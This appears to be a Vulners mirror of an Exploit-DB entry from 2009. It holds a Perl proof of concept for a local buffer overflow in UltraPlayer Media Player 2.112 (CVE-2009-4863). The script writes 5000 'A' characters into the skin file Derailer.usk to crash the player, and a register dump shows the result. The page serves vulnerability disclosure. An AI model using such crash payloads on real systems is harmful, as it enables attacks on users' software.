Lucene search
+L

UltraPlayer Media Player 2.112 - Local Buffer Overflow (PoC)

🗓️ 05 Aug 2009 00:00:00Reported by SarBoT511Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

UltraPlayer Media Player 2.112 Local Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-4863
5 Aug 200900:00
circl
cve
CVE
CVE-2009-4863
10 May 201020:00
cve
cvelist
Cvelist
CVE-2009-4863
10 May 201020:00
cvelist
euvd
EUVD
EUVD-2009-4826
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-4863
11 May 201012:02
nvd
openvas
OpenVAS
UltraPlayer Media Player Buffer Overflow Vulnerability
19 May 201000:00
openvas
openvas
OpenVAS
UltraPlayer Media Player Buffer Overflow Vulnerability
19 May 201000:00
openvas
prion
Prion
Stack overflow
11 May 201012:02
prion
#!/usr/bin/perl

#UltraPlayer Media Player 2.112

#Coded by SarBoT511

#Download : http://download.cnet.com/UltraPlayer-Media-Player/3000-2139_4-10041974.html?tag=mncol

#GreatZ [ 2] : nEt^DeV!L [s4udi~cod3r] , dev1l fucker , The gobL!n , alM511 , BlacK_Zero , l!NUX_dROUx,HCJ.

#The Bug in thes place (C:\Program Files\UltraPlayer\Skins\Derailer.usk)

#EAX 00EDFBC0
#ECX 000002F4
#EDX 00000000
#EBX 41414141
#ESP 0012FB78
#EBP 0012FB80
#ESI 00EDEFF0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 00000000
#EIP 00471733 UPlayer.00471733


$str="A"x 5000;
$file="Derailer.usk";
open(my $FILE, ">>$file") or die "Error opening file.n";
print $FILE $str ;
close($FILE);
print "$file has been created.n";

# milw0rm.com [2009-08-05]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Sep 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.05757
30